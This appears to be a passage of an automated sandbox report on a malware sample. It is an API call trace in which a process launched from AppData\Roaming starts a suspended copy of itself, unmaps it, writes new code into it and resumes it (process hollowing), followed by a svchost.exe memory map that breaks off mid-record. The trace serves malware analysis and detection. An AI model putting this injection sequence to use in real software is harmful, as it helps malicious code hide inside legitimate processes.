[0155.318] RegisterClassExA (param_1=0x18e828) returned 0x20c059 [0155.319] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x50148 [0155.392] PostMessageA (hWnd=0x50148, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0155.393] GetMessageA (in: lpMsg=0x18e858, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e858) returned 1 [0155.393] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0155.393] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1c0000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0155.393] GetStartupInfoA (in: lpStartupInfo=0x18e77c | out: lpStartupInfo=0x18e77c*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0155.393] GetCommandLineA () returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " [0155.393] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr", lpCommandLine="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e77c*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e7d4 | out: lpCommandLine="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr ", lpProcessInformation=0x18e7d4*(hProcess=0x7c, hThread=0x78, dwProcessId=0xf3c, dwThreadId=0xf40)) returned 1 [0155.402] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0155.402] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0155.403] GetThreadContext (in: hThread=0x78, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x403410, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0155.409] ReadProcessMemory (in: hProcess=0x7c, lpBaseAddress=0x7efde008, lpBuffer=0x18e7c8, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e7c8*, lpNumberOfBytesRead=0x0) returned 1 [0155.409] NtUnmapViewOfSection (ProcessHandle=0x7c, BaseAddress=0x400000) returned 0x0 [0155.412] VirtualAllocEx (hProcess=0x7c, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0155.412] NtWriteVirtualMemory (in: ProcessHandle=0x7c, BaseAddress=0x400000, Buffer=0x315a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x315a0*, NumberOfBytesWritten=0x0) returned 0x0 [0155.414] NtWriteVirtualMemory (in: ProcessHandle=0x7c, BaseAddress=0x401000, Buffer=0x317a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x317a0*, NumberOfBytesWritten=0x0) returned 0x0 [0155.416] WriteProcessMemory (in: hProcess=0x7c, lpBaseAddress=0x7efde008, lpBuffer=0x31654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x31654*, lpNumberOfBytesWritten=0x0) returned 1 [0155.417] SetThreadContext (hThread=0x78, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x402f47, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0155.418] ResumeThread (hThread=0x78) returned 0x1 [0155.418] CloseHandle (hObject=0x78) returned 1 [0155.418] CloseHandle (hObject=0x7c) returned 1 [0155.418] ExitProcess (uExitCode=0x0) [0155.418] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a07d0 | out: hHeap=0x5a0000) returned 1 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xa35b000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1200 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1201 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1202 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1203 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1204 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1205 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1206 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1207 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1208 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1209 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1210 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1211 start_va = 0x190000 end_va = 0x19afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1212 start_va = 0x1a0000 end_va = 0x1acfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1213 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 1214 start_va = 0x1c0000 end_va = 0x1c9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 1215 start_va = 0x1d0000 end_va = 